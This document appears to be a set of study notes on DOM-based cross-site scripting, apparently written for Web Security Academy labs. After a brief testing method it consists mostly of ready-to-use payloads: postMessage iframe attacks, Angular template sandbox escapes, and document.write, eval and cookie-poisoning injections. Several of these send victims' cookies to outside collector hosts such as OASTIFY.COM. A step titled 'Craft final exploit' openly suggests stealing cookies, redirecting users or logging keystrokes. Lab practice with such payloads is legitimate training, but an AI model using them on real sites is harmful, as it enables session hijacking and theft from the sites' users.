DOM-based

• Identify potential sources of user input:

  • Look for URL parameters, form inputs, or fragments (#fragment) that the page processes dynamically using JavaScript.

  • Use browser developer tools to inspect how JavaScript interacts with the DOM. Look for dangerous methods like innerHTML, document.write(), eval(), or similar.

• Test for input reflection:

  • Modify input that is passed through URL parameters or fragments to see if it appears on the page without proper encoding or sanitization. For example:

    • https://example.com/page.html?param=<script>alert('XSS')</script>

    • https://example.com/page.html#<script>alert('XSS')</script>

• Probe with harmless scripts:

  • Start by injecting simple, non-malicious scripts like <img src=x onerror=alert(1)> to check whether the browser executes your code. If the alert box appears, it’s a sign the input is not properly sanitized.

• Explore execution context:

  • Investigate where your input is reflected in the DOM. Sometimes the payload might be reflected in HTML, but within a script block or as part of an event handler, like onmouseover, making the context important.

• Craft final exploit:

  • If the injection point allows it, create a malicious payload that achieves your goal, such as stealing cookies, redirecting the user, or logging keystrokes.

  • Deliver the payload via a URL or other input method to trigger the exploit.

Common attack vectors:

• URL parameters or fragment identifiers (#fragment).

• Insecure client-side JavaScript that processes user-controlled data directly.

Post message listener:

<iframe src="https://target.net/" onload="this.contentWindow.postMessage('javascript:document.location=`https://collaborator.com?c=`+document.cookie','*')">

<iframe src="https://0adb00b304aa512b809fe4f1006100fe.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print()//http:','*')">

Post message innerHTML:

<iframe src="https://target.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=fetch(`https://OASTIFY.COM?collector=`+btoa(document.cookie))>','*')">

<iframe src="https://target..net" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">

Post message JSON:

<iframe src=https://TARGET.net/ onload='this.contentWindow.postMessage(JSON.stringify({
    "type": "load-channel",
    "url": "javascript:document.location='https://OASTIFY.COM?c='+document.cookie"
}), "*");'>

Angular ng-app

Using functions inside angular scope, rember about () at the end that run new constructed fn

#Check for fn available inside angular scope
angular.element(document.getElementById('id-inside-ng-app')).scope();


{{$on.constructor('document.location="https://OASTIFY.COM?c="+document.cookie')()}}

{{$eval.constructor('alert(1)')()}}

document.write, accepts script like:

"></select><script>document.location='https://OASTIFY.COM/?domxss='+document.cookie</script>//

eval input

\"-fetch('https://OASTIFY.COM?reflects='+document.cookie)}//

cookie manipulation

cookie based on last url, redirect on home page after loading payload(malicious page is saved as cookie)

<iframe src="https://target.web-security-academy.net/product?productId=1&'><script>print()</script>" onload="if(!window.x)this.src='https://target.web-security-academy.net';window.x=1;">


<iframe src="https://TARGET.net/product?productId=1&'><script>print()</script>" onload="if(!window.x)this.src='https://TARGET.net';window.x=1;">

When the iframe loads for the first time, the browser temporarily opens the malicious URL, which is then saved as the value of the lastViewedProduct cookie. The onload event handler ensures that the victim is then immediately redirected to the home page, unaware that this manipulation ever took place. While the victim's browser has the poisoned cookie saved, loading the home page will cause the payload to execute.